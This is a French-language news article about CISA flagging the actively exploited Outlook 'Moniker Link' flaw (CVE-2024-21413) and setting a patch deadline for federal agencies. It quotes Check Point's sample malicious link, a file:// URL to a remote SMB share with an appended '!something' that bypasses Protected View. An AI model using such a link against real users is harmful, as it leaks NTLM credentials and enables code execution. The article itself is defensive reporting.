CISA a averti jeudi les agences fédérales américaines de sécuriser leurs systèmes contre les attaques en cours ciblant une vulnérabilité critique d’exécution de code à distance (RCE) de Microsoft Outlook.
Découverte par Haifei Li, chercheur en vulnérabilités de Check Point, et identifiée sous le numéro CVE-2024-21413, la faille est causée par une validation incorrecte des entrées lors de l’ouverture d’e-mails contenant des liens malveillants utilisant des versions vulnérables d’Outlook.
Les attaquants acquièrent des capacités d’exécution de code à distance car la faille leur permet de contourner la vue protégée (qui devrait bloquer le contenu nuisible incorporé dans les fichiers Office en les ouvrant en mode lecture seule) et d’ouvrir des fichiers Office malveillants en mode édition.
Lorsqu’il a corrigé CVE-2024-21413 il y a un an, Microsoft a également averti que le volet de prévisualisation est un vecteur d’attaque, permettant une exploitation réussie même lors de la prévisualisation de documents Office conçus de manière malveillante.
Comme Check Point l’a expliqué, cette faille de sécurité (surnommée Lien de Moniker) permet aux auteurs de menaces de contourner les protections Outlook intégrées pour les liens malveillants intégrés dans les e-mails à l’aide du protocole file:// et en ajoutant un point d’exclamation aux URL pointant vers des serveurs contrôlés par l’attaquant.
Le point d’exclamation est ajouté juste après l’extension de fichier, avec du texte aléatoire (dans leur exemple, Check Point a utilisé « quelque chose »), comme indiqué ci-dessous:
*<a href= »file:///\\10.10.111.111\test\test.rtf!something »>CLICK ME</a>*
CVE-2024-21413 affecte plusieurs produits Office, notamment Microsoft Office LTSC 2021, Microsoft 365 Apps for Enterprise, Microsoft Outlook 2016 et Microsoft Office 2019, et les attaques CVE-2024-21413 réussies peuvent entraîner le vol d’informations d’identification NTLM et l’exécution de code arbitraire via des documents Office conçus de manière malveillante.
Jeudi, CISA a ajouté la vulnérabilité à son catalogue de vulnérabilités exploitées connues (KEV), la marquant comme activement exploitée. Comme l’exige la Directive opérationnelle contraignante (BOD) 22-01, les agences fédérales doivent sécuriser leurs réseaux dans les trois semaines avant le 27 février.
« Ces types de vulnérabilités sont des vecteurs d’attaque fréquents pour les cyberacteurs malveillants et présentent des risques importants pour l’entreprise fédérale », a averti l’agence de cybersécurité.
Alors que CISA se concentre principalement sur l’alerte des agences fédérales sur les vulnérabilités qui devraient être corrigées dès que possible, il est également conseillé aux organisations privées de prioriser la correction de ces failles pour bloquer les attaques en cours.